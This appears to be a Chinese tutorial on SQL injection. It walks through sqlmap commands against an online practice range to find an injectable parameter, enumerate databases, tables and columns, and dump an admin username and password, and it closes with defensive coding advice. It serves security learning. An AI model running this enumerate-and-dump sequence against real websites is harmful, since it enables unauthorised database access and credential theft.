一、前言
- SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作
- SQL注入漏洞属于高危漏洞,用asp、.net、php、java、等程序语言编写的网站,都存在着sql注入的风险,一旦成功注入,轻者被暴库,整个网站被控制,重者服务器被攻陷,甚至突破到内网。
- 互联网安全法规定,不经授权对其它网站进行漏洞扫描,渗透都是违法行为,所以我们的技术学习、验证都是自己搭建的目标靶机,或者使用一些安全网站的在线靶场(专门提供给学习渗透人员使用的模拟网站)
二、相关工具准备
- sqlmap,sql注入常用的工具
- 在线靶场,用于sql注入测试的在线网站,我们这次使用 http://59.63.200.79:8003/
三、流程方案简述
- 检测网站是否存在sql注入漏洞,我们需要找到一个注入点,一般都是数据提交的地方,或者新闻资讯列表详情页,类似下面这种url后面接参数id的,而且参数id是动态变化的。
http://www.xx.com/xxx.php?id=1
- 如果存在注入漏洞,猜解数据库
- 根据数据库,继续猜解表
- 选择某个表(一般选择可能存储账号密码的表,比如user、admin、member等),继续猜解字段
- 猜解关键字段(比如 username,password)的值,获取到用户名和密码
四、具体测试过程
1. 打开靶场网站,寻找注入点
-
浏览器打开靶场网站,很容易就找到了注入点(为了方便测试,这个注入点也太明显了吧)
image.png
http://59.63.200.79:8003/?id=1
- 执行下面的命令,检测是否存在sql注入漏洞
sqlmap -u "http://59.63.200.79:8003/?id=1"
image.png
- 的确是存在sql注入漏洞的,这个id参数存在布尔值注入漏洞,和延时注入漏洞,使用的是mysql数据库
2. 猜解数据库
- 执行下面的命令,--dbs参数,表示猜解所有的数据库
sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs
image.png
- 如图所示,一共发现了三个数据库,根据网站的内容很容可以猜到我们的目标数据库是 maoshe
3. 继续猜解表
- 执行下面的命令,--tables参数,表示猜解所有的表,-D指定数据库,注意大小写
sqlmap -u "http://59.63.200.79:8003/?id=1" --tables -D maoshe
image.png
- 如图所示,我们发现数据maoshe中一共有4张表,根据经验一般,用户或者管理员信息在admin这个表中,当然如果不是,你只能一个个的去试了
4. 继续猜解表的字段
- 执行下面的命令,--colunms参数,表示猜解所有字段,-T 指定表
sqlmap -u "http://59.63.200.79:8003/?id=1" --columns -T admin -D maoshe
image.png
- 如图所示,我们发现这个admin表中有三个字段,很显然username 和password 就是对应的用户名和密码
5. 获取用户名和密码
- 执行下面的命令,--colunms参数,表示猜解所有字段,-T 指定表
sqlmap -u "http://59.63.200.79:8003/?id=1" --dump -C username,password -T admin -D maoshe
image.png
- 这样我们就拿到了账号admin和密码 hellohack
五、最后
- 本次测试主要使用了sqlmap工具,此工具还有很多其他的功能,比如猜解的时候可以开启多线程,提高猜解的效率等,另外针对不同的语言编写的网站,以上执行的命令略有不同,这里我们演示的网站是php编写的。
- 因为是靶场网站,所以数据库的数量,表的数量,字段的数量都很少,甚至注入点也很明显,因为我们的目的只是为了演示技术,而不是为了渗透别人的网站。真正的渗透测试环境肯定要比这个复杂的多。
- 为了应对sql注入的风险,我们的网站要注意以下几点
- 对用户的输入进行校验,限制输入、过滤一些特殊的敏感符号等
- 不要使用动态拼装sql的方式,进行数据查询存取
- 不要使用管理员权限的账号连接数据库,为每个应用的数据库分配有限权限的账号
- 不要明文存储敏感信息,可以使用一些加密方法
- 应用的异常信息应该给出尽可能少的提示,最好使用自定义的错误信息对原始错误信息进行包装
网友评论